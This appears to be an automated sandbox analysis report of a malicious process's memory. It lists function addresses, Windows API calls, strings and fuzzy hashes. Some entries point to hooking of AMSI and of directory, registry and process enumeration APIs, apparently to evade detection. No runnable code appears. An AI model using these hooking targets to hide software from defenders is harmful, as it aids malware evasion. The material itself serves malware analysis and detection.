String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 6c004f37e9f1c915376b53e3f421fb428432a4bcb26b9ce800ca2081cd5688aa
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: E6519CA0100E4AE6FB42DF64EC8C7D8A321E79F746FD08916D419431E5EE78C29EC399

Function 000002527DEE3A1C Relevance: 4.5, APIs: 3, Instructions: 39
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000002527DEE3A35
PathFindFileNameW.SHLWAPI ref: 000002527DEE3A44

Part of subcall function 000002527DEE3F88: StrCmpNIW.SHLWAPI(?,?,?,000002527DEE272F), ref: 000002527DEE3FA0

Part of subcall function 000002527DEE3EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000002527DEE3A5B), ref: 000002527DEE3EDB
Part of subcall function 000002527DEE3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002527DEE3A5B), ref: 000002527DEE3F0E
Part of subcall function 000002527DEE3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002527DEE3A5B), ref: 000002527DEE3F2E
Part of subcall function 000002527DEE3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002527DEE3A5B), ref: 000002527DEE3F47
Part of subcall function 000002527DEE3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002527DEE3A5B), ref: 000002527DEE3F68

CreateThread.KERNELBASE ref: 000002527DEE3A8B

Part of subcall function 000002527DEE1E74: GetCurrentThread.KERNEL32 ref: 000002527DEE1E7F
Part of subcall function 000002527DEE1E74: CreateThread.KERNELBASE ref: 000002527DEE2043
Part of subcall function 000002527DEE1E74: TlsAlloc.KERNEL32 ref: 000002527DEE2049
Part of subcall function 000002527DEE1E74: TlsAlloc.KERNEL32 ref: 000002527DEE2055
Part of subcall function 000002527DEE1E74: TlsAlloc.KERNEL32 ref: 000002527DEE2061
Part of subcall function 000002527DEE1E74: TlsAlloc.KERNEL32 ref: 000002527DEE206D
Part of subcall function 000002527DEE1E74: TlsAlloc.KERNEL32 ref: 000002527DEE2079
Part of subcall function 000002527DEE1E74: TlsAlloc.KERNEL32 ref: 000002527DEE2085

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
String ID:
API String ID: 2779030803-0
Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction ID: a303dc3d1181dab7a77e9575de848fa1722927f00e0e98bc569a4a4b76e44015
Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
Instruction Fuzzy Hash: 4D112931610F01C3FBA2E732AD4D3ADE291EB6FB47F904119D40A821D4EF78C58C8619

Function 000002527DEEF598 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 000002527DEEF611
GetFileType.KERNELBASE ref: 000002527DEEF627

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction ID: d87afb56aa0498c6f51db4438266777f9f971699076ad372ca0e41d3bd48dbeb
Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction Fuzzy Hash: 2731B622610F45D3FB61CB249988269A650F35EBB1FE50309DB6A473F0CB35D8A5C384

Function 000002527DF1F598 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32 ref: 000002527DF1F611
GetFileType.KERNELBASE ref: 000002527DF1F627

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction ID: 7c09bb7383606170a7a98670e81d67eb35ea90bfd1e2747ba04049209a37b666
Opcode Fuzzy Hash: d8bdb561d8588ff3a06e22568a35befa5f6db2390d5457c7351101905abceb47
Instruction Fuzzy Hash: D431B423614F44D2EB60CB159998269B650F74EBB1F690309DB7A073F0CB36D8A5D346

Function 000002527DEB2EBC Relevance: 1.7, APIs: 1, Instructions: 240libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE ref: 000002527DEB302E

Memory Dump Source

Source File: 00000014.00000003.2189620345.000002527DEB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002527DEB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_2527deb0000_cmd.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction ID: cb0d4190fe80a46d168a930b3b74f902c2ce53e92bfc07c2dcb1d89c21a63261
Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
Instruction Fuzzy Hash: DA912672B01990C7DB65CF29D809F69F3D5FB4AB96F5481249E4907BC8DA34F81AC708

Function 000002527DEE1BC4 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000002527DEE1724: GetProcessHeap.KERNEL32 ref: 000002527DEE172F
Part of subcall function 000002527DEE1724: HeapAlloc.KERNEL32 ref: 000002527DEE173E
Part of subcall function 000002527DEE1724: RegOpenKeyExW.ADVAPI32 ref: 000002527DEE17AE
Part of subcall function 000002527DEE1724: RegOpenKeyExW.ADVAPI32 ref: 000002527DEE17DB
Part of subcall function 000002527DEE1724: RegCloseKey.ADVAPI32 ref: 000002527DEE17F5
Part of subcall function 000002527DEE1724: RegOpenKeyExW.ADVAPI32 ref: 000002527DEE1815
Part of subcall function 000002527DEE1724: RegCloseKey.ADVAPI32 ref: 000002527DEE1830
Part of subcall function 000002527DEE1724: RegOpenKeyExW.ADVAPI32 ref: 000002527DEE1850
Part of subcall function 000002527DEE1724: RegCloseKey.ADVAPI32 ref: 000002527DEE186B
Part of subcall function 000002527DEE1724: RegOpenKeyExW.ADVAPI32 ref: 000002527DEE188B
Part of subcall function 000002527DEE1724: RegCloseKey.ADVAPI32 ref: 000002527DEE18A6
Part of subcall function 000002527DEE1724: RegOpenKeyExW.ADVAPI32 ref: 000002527DEE18C6

SleepEx.KERNELBASE ref: 000002527DEE1BDF

Part of subcall function 000002527DEE1724: RegCloseKey.ADVAPI32 ref: 000002527DEE18E1
Part of subcall function 000002527DEE1724: RegOpenKeyExW.ADVAPI32 ref: 000002527DEE1901
Part of subcall function 000002527DEE1724: RegCloseKey.ADVAPI32 ref: 000002527DEE191C
Part of subcall function 000002527DEE1724: RegOpenKeyExW.ADVAPI32 ref: 000002527DEE193C
Part of subcall function 000002527DEE1724: RegCloseKey.ADVAPI32 ref: 000002527DEE1957
Part of subcall function 000002527DEE1724: RegOpenKeyExW.ADVAPI32 ref: 000002527DEE1977
Part of subcall function 000002527DEE1724: RegCloseKey.ADVAPI32 ref: 000002527DEE1992
Part of subcall function 000002527DEE1724: RegCloseKey.ADVAPI32 ref: 000002527DEE199C

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: CloseOpen$Heap$AllocProcessSleep
String ID:
API String ID: 948135145-0
Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction ID: bd2d7eaf7a14cefa7f2528e5c977ed793689df24c68ed188840da6f28cea7ab4
Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
Instruction Fuzzy Hash: EB31F865200E41C3FB56DB36DD483ADA3A4EB4EBC2F4454618E0AC73D6EE34C8D8922D

Non-executed Functions

Function 000002527DEE2FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000002527DEE3094
lstrlenW.KERNEL32 ref: 000002527DEE32BE

Part of subcall function 000002527DEE1A30: OpenProcess.KERNEL32 ref: 000002527DEE1A56
Part of subcall function 000002527DEE1A30: K32GetModuleFileNameExW.KERNEL32 ref: 000002527DEE1A74
Part of subcall function 000002527DEE1A30: PathFindFileNameW.SHLWAPI ref: 000002527DEE1A83
Part of subcall function 000002527DEE1A30: lstrlenW.KERNEL32 ref: 000002527DEE1A8F
Part of subcall function 000002527DEE1A30: StrCpyW.SHLWAPI ref: 000002527DEE1AA2
Part of subcall function 000002527DEE1A30: CloseHandle.KERNEL32 ref: 000002527DEE1AB0

GetProcAddress.KERNEL32 ref: 000002527DEE30A9

Part of subcall function 000002527DEE3F88: StrCmpNIW.SHLWAPI(?,?,?,000002527DEE272F), ref: 000002527DEE3FA0

StrCmpNIW.SHLWAPI ref: 000002527DEE30EC
lstrlenW.KERNEL32 ref: 000002527DEE3214

Strings

NtQueryObject, xrefs: 000002527DEE309F
ntdll.dll, xrefs: 000002527DEE308D
\Device\Nsi, xrefs: 000002527DEE30DF

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: dadce38def0108ea0373d5689581338bd07ab6437b61b5bea6a84c1accaaf544
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: 93B14B32210E90C3FB66CF26D8487A9E3A4F74AF86F545016EE5993BD5DA35C988C348

Function 000002527DF12FF0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 256
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000002527DF13094
lstrlenW.KERNEL32 ref: 000002527DF132BE

Part of subcall function 000002527DF11A30: OpenProcess.KERNEL32 ref: 000002527DF11A56
Part of subcall function 000002527DF11A30: K32GetModuleFileNameExW.KERNEL32 ref: 000002527DF11A74
Part of subcall function 000002527DF11A30: PathFindFileNameW.SHLWAPI ref: 000002527DF11A83
Part of subcall function 000002527DF11A30: lstrlenW.KERNEL32 ref: 000002527DF11A8F
Part of subcall function 000002527DF11A30: StrCpyW.SHLWAPI ref: 000002527DF11AA2
Part of subcall function 000002527DF11A30: CloseHandle.KERNEL32 ref: 000002527DF11AB0

GetProcAddress.KERNEL32 ref: 000002527DF130A9

Part of subcall function 000002527DF13F88: StrCmpNIW.SHLWAPI(?,?,?,000002527DF1272F), ref: 000002527DF13FA0

StrCmpNIW.SHLWAPI ref: 000002527DF130EC
lstrlenW.KERNEL32 ref: 000002527DF13214

Strings

\Device\Nsi, xrefs: 000002527DF130DF
NtQueryObject, xrefs: 000002527DF1309F
ntdll.dll, xrefs: 000002527DF1308D

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction ID: b90af60322b20cd27978d5265888c65b4f21062be448506b439fbf5dce7beb39
Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
Instruction Fuzzy Hash: B8B19162210E90C2EB64DF26DC08799E3E4F74AB96F44501AEE29537D4DF36CD88C349

Function 000002527DEE84B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000002527DEE84CC
RtlCaptureContext.NTDLL ref: 000002527DEE84F9
RtlLookupFunctionEntry.NTDLL ref: 000002527DEE8513
RtlVirtualUnwind.NTDLL ref: 000002527DEE8554
IsDebuggerPresent.KERNEL32 ref: 000002527DEE85A8
SetUnhandledExceptionFilter.KERNEL32 ref: 000002527DEE85C5
UnhandledExceptionFilter.KERNEL32 ref: 000002527DEE85D0

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: b2d1cc67dd3afe47afa065bc42dd809506d39399c4b00122e746171b21087ada
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: 17312772205F80C6EBA1CF60E8847AEB364F78A745F44452ADA4E47BD9EF38C6488714

Function 000002527DF184B0 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000002527DF184CC
RtlCaptureContext.NTDLL ref: 000002527DF184F9
RtlLookupFunctionEntry.NTDLL ref: 000002527DF18513
RtlVirtualUnwind.NTDLL ref: 000002527DF18554
IsDebuggerPresent.KERNEL32 ref: 000002527DF185A8
SetUnhandledExceptionFilter.KERNEL32 ref: 000002527DF185C5
UnhandledExceptionFilter.KERNEL32 ref: 000002527DF185D0

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction ID: 129fbd740bd05eb97218e88681d7ccb800c915471e26831a9a6bb06b13b93a89
Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
Instruction Fuzzy Hash: 3C314672204F80DAEB60CF60E8443EEB360F789759F44402ADA5E47BD8DF78C6488715

Function 000002527DEECD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000002527DEECE0B
RtlLookupFunctionEntry.NTDLL ref: 000002527DEECE23
RtlVirtualUnwind.NTDLL ref: 000002527DEECE5E
IsDebuggerPresent.KERNEL32 ref: 000002527DEECE97
SetUnhandledExceptionFilter.KERNEL32 ref: 000002527DEECEA1
UnhandledExceptionFilter.KERNEL32 ref: 000002527DEECEAC

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: f8bf74f222bf6600dc9dea61267c9134b5e316cbb8d8ed0c25a0ba51c25bfa81
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: 61416C36214F80C6EB61CF25E8447AEB3A4F78A755F500215EA9D47BE9DF38C199CB04

Function 000002527DF1CD80 Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000002527DF1CE0B
RtlLookupFunctionEntry.NTDLL ref: 000002527DF1CE23
RtlVirtualUnwind.NTDLL ref: 000002527DF1CE5E
IsDebuggerPresent.KERNEL32 ref: 000002527DF1CE97
SetUnhandledExceptionFilter.KERNEL32 ref: 000002527DF1CEA1
UnhandledExceptionFilter.KERNEL32 ref: 000002527DF1CEAC

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction ID: d475a980ff1206aa154f053193d5efdf5eda5fbe179810dc1eacc217b108f879
Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
Instruction Fuzzy Hash: E1417C36214F80C6EB60CF24E8443AEB3A4F789765F540115EAAD47BD8DF38C599CB45

Function 000002527DEEDA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 000002527DEEDB99
FindNextFileW.KERNEL32 ref: 000002527DEEDCCF
FindClose.KERNEL32 ref: 000002527DEEDD0F
FindClose.KERNEL32 ref: 000002527DEEDD3B

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 7a1d81be4e738ca8bb3dcced6085def01c43567e421a885f74f7920ad957b3a8
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 05A10722704E80CAFB22DB75EC483ADFBA1E74B795F1C4115DE982B6D9DA34C449C708

Function 000002527DF1DA18 Relevance: 6.2, APIs: 4, Instructions: 240fileCOMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 000002527DF1DB99
FindNextFileW.KERNEL32 ref: 000002527DF1DCCF
FindClose.KERNEL32 ref: 000002527DF1DD0F
FindClose.KERNEL32 ref: 000002527DF1DD3B

Memory Dump Source

Source File: 00000014.00000002.2573660018.000002527DF11000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DF10000, based on PE: true

Associated: 00000014.00000002.2572815512.000002527DF10000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2574698088.000002527DF25000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2575545537.000002527DF30000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2576428438.000002527DF32000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2577258999.000002527DF39000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527df10000_cmd.jbxd

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction ID: 89d90e62fadc840837a39b706f45271b02775153ae4a02cc2c29cf8e517dc6cd
Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
Instruction Fuzzy Hash: 16A1FB22704E80C9FB20DB75DC483AEFBB1E74B795F184116DE6927AD5CA39C449C70A

Function 000002527DEE8090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000002527DEE80BC
GetCurrentThreadId.KERNEL32 ref: 000002527DEE80CA
GetCurrentProcessId.KERNEL32 ref: 000002527DEE80D6
QueryPerformanceCounter.KERNEL32 ref: 000002527DEE80E6

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

Associated: 00000014.00000002.2565302689.000002527DEE0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2568003239.000002527DEF5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2569195844.000002527DF00000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2570458513.000002527DF02000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000014.00000002.2571664744.000002527DF09000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_2527dee0000_cmd.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction ID: 0cc463f220939676752168fcadcdbc4bf167e07fe2b2dd0cac9a0bd593e670e8
Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
Instruction Fuzzy Hash: E3111526710F04CAEB40CB60EC583A873A4F76E759F840E21EA6D867E4DB78C1588344

Function 000002527DEE11D4 Relevance: 3.8, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002527DEE11E1
HeapFree.KERNEL32 ref: 000002527DEE11F0
GetProcessHeap.KERNEL32 ref: 000002527DEE1200

Memory Dump Source

Source File: 00000014.00000002.2566578597.000002527DEE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002527DEE0000, based on PE: true

